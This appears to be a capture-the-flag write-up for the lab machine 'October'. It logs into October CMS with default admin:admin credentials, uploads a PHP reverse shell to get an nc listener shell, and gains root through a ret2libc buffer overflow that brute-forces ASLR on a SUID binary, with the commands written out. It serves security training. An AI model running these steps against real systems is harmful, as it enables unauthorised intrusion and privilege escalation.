# OCTOBER | 10.10.10.16

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.16

### Open Ports and Their Services

* 22 - SSH - OpenSSH 6.6p1 Ubuntu
* 80 - HTTP - Apache 2.4.7 Ubuntu - October CMS - Vanilla

## Service Enumeration

### 22 - SSH

This is your standard SSH server, albeit a not very recent version. We're going to look for another way in or find valid credentials before coming back here.

### 80 - HTTP

This server is running the October CMS program, and it has links that lead to a blog, a forum, and account creation.

![](img/port-80.png)

I started a gobuster crawl but I was unable to get anywhere due to it timing out and/or being way too slow, so instead I searched for  "october cms admin" on google and found that the address for the admin area was "/backend" so I went there and found an admin login page:

![](img/admin-area.png)


So I was able to log in with default creds (admin:admin), but it appears I do not have total access to all functions:

![](img/denied.png)

Searchsploit has a few hits, but it depends on what build version is running, and my so-called 'admin' is unable to see what build number is actually running. I'm going to go out on a limb and hope the build is 412.

## Exploitation

One of the potential vulns is a remote command execution vuln, so if I follow the instructions I should be able to upload a php reverse shell. I just need to make sure the file extension is '.php5' and I should be allowed to upload it.

My Kali box already has a nice php reverse shell stored at `/usr/share/webshells/php/php-reverse-shell.php` - I'll use that one, making sure to change what I need to change.

![](img/upload.png)

    rlwrap nc -nvlp 6969

And now I have a shell:

![](img/user-shell.png)

### Flag

![](img/user-flag.png)

## User Enumeration

I am the www-data user, but there is a regular user called 'harry' and obviously the root user. Also, in harry's home dir there is confirmation that the version of October CMS is indeed build 412.

In harry's home dir there is a '.composer' folder that is owned by root - it has some potential public ssh keys there, as well as an '.htaccess' file.

![](img/composer.png)

I used linpeas to enumerate better than I can and it found a few things that might be useful: I think a password for the SQL db running locally, a '.sh' file in the PATH, and potentially a vulnerable SUID binary as well as two hashes (not sure what they could be for though):

![](img/octobercmspassword.png)

![](img/gettext.png)

![](img/suid.png)

Linux Exploit Suggester also has some potential kernel exploits I could try:

![](img/kernelexploits.png)

This is all nice, but clearly the privesc route is via the vulnerable program at `/usr/local/bin/ovrflw`.

## Privilege Escalation

### Escalation via Buffer Overflow

This is a thing that I am not too familiar with, and I definitely had to resort to writeups and youtube videos in order to complete this exploit. If you want to get into more detail about this privesc, check out the [video](https://www.youtube.com/watch?v=K05mJazHhF4) by Ippsec - I learned the most from his video.

Basically, we need to figure out how to crash the program, and then determine the correct positions in memory that we can get a shell. The box has ASLR enabled, which means the memory addresses are somewhat randomized. But it is possible to brute force the addresses in order to get a shell.

#### Crashing the program

The first thing I do is try to crash the program by sending it junk:

    ./ovrflw `python -c 'print "A"*200'`

This crashes it real good, causing a segmentation fault:

![](img/segfault.png)

#### Finding the EIP offset

Kali has a couple of good applications for this - they come with the Metasploit Framework. The first thing I need to do is to generate a non-repeating sequence of characters, and then send it to the program.  
Then when I observe the program in gdb (which is a debugging program), I can grab the unique sequence at the crash point and put it through another application, which will tell me at exactly what point (in bytes) the program crashed.

Before trying this it is a good idea to transfer the binary to your Kali machine. In Kali, execute

    nc lp 9999 > ovrflw

And on the victim machine, execute

    nc -w 5 <kali-ip> 9999 < ovrflw

That will transfer the binary over to you.

Next, clone the [PEDA](https://github.com/longld/peda) repo, and follow the instructions on the page to activate it.

Now, load the binary into gdb and it should come with more colours (thanks to PEDA) and whatnot:

    gdb ./ovrflw

Then, in another terminal, generate the sequence of nonrepeating characters:

    msf-pattern_create -l 200

Back in gdb, run the program with a simple python command like before, substituting the `print "A" * 200` command with the sequence of characters:

    r `python -c 'print("<chars go here>")'`

This should crash the program, but gdb will have output; the sequence at the bottom is what you should be focused on. Copy that sequence.

![](img/gdb-segfault.png)

Then, use the other program for finding the point at which the binary crashed:

    msf-pattern_offset -q <sequence>

If things are going correctly, the result should be 112, which means that if you send 112 bytes of info to the binary, it will crash and overwrite the EIP - buffer overflow:

![](img/offset.png)

To confirm, let's open the binary in gdb again and do another small command:

    gdb ./ovrflw
    r `python -c 'print("A" * 112 + "BBBB")'`

This will send 112 A's and 4 B's, and the output at the bottom of gdb should be 0x42424242 - which is hex for four B's:

![](img/BBBB.png)

#### Checking the security protocols

Now, we need to find out what kind of buffer overflow attack we can actually do. If there are no security protocols in place, both on the binary and on the victim machine, then we could do a very simple one.

So, in gdb still, execute the following command:

    aslr

This binary has ASLR turned off, which is good. ASLR stands for **Address Space Layout Randomization**, which is a security technique that randomizes the location of the base address of a binary, as well as the positions of the libraries, heap and stack.  
This makes it more difficult to attack a binary as many memory layouts are randomized.

We also need to check if ASLR is enabled on the victim machine, and we do it using the following command:

    cat /proc/sys/kernel/randomize_va_space

If the output is 0, then ASLR is disabled. 1 or 2 means it is enabled. On our victim machine, it is enabled, which will make this attack more difficult:

![](img/aslr-on.png)

Back on your machine, in gdb, execute the following command: `checksec`. The output shows that **NX** is enabled, and **RELRO** is listed as 'Partial'.

![](img/checksec.png)

NX means **No-Execute** - parts of the programs memory are marked as non-executable, so we can't put code there to get a shell, for instance. This makes it more difficult to exploit.

RELRO Partial is harder for me to explain, but to make a long story short, partial means the binary is still exploitable, whereas Full might mean it is either not exploitable or way more difficult.

To confirm this, on the victim machine we can run this command, several times, and we'll see the memory location change each time:

    ldd ovrflw | grep libc

Even though it changes, we can see that some parts stay constant. `0xb7XXX000` - the first of the Xs is either a 5 or a 6; that's 2.

The second and third X can be any hex value, and there are 16 per space. So, let's do math to figure out how may possibilities we have.

    2 x 16 x 16

which is 512. So we have 512 possible locations for the memory addresses we need to find (which we'll see in a bit) - which is within the realm of bruteforcing. I should note that this kind of attack is only possible on 32-bit machines.

#### ret2libc

This is a specific buffer overflow attack in which we circumvent the NX bit by having a function in the C library (libc.so.6) call a shell for us, rather than trying to execute shellcode (which we can't do because of the NX bit).  
This method invloves a little bit of sleuthing, in order to find one of the 512 possible locations due to ASLR being enabled.

OK, so let's find an address for libc.so.6 in the binary. From here on in we'll be working on the victim machine.

    ldd /usr/local/bin/ovrflw | grep libc

Take the result of that and put it in a new python script, which we'll use for the attack. A completed version is [here](exploits/buffy.py) - you can fill in your own values if you want.

![](img/libc-base-addr.png)

Now, it is time to find the offsets for **system**, **exit** and **/bin/sh**. For the first two just type this command on the victim machine:

    readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
    readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit

![](img/system-offset.png)
![](img/exit-offset.png)

You need a different command to find the /bin/sh in the library:

    strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

The results of all of these need to go into the script that is provided.

Now, in order to determine the addresses for system, exit and /bin/sh we do simple math, as can be seen in the script:

![](img/maths.png)

Actually, the script contains pretty detailed comments so I'll just add a screenshot here:

![](img/buffy-script.png)

Make sure to put in the correct path to the vulnerable binary, otherwise you'll get an error.

#### Mounting the attack

Now, with all values in place, it is time to do the attack. Run the script:

    ./buffy.py

Then, after a lot of tries I finally have a shell:

![](img/root-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

I could not have rooted this box without getting help; I have so little knowledge of buffer overflow attacks that I was utterly helpless. But after seeking help and following tutorials and then forcing myself to do it several times (as well as doing this writeup), I have a better grasp, and a good foundation to learn more about them.

Steps taken:

* Use default creds to log into October CMS backend
* Upload a php reverse shell to gain limited user privileges
* Enumerate until I found a vulnerable binary with the SUID bit set
* Fuzz program to determine weaknesses  - buffer overflow
* Develop python exploit to bruteforce memory addresses until I get a root shell
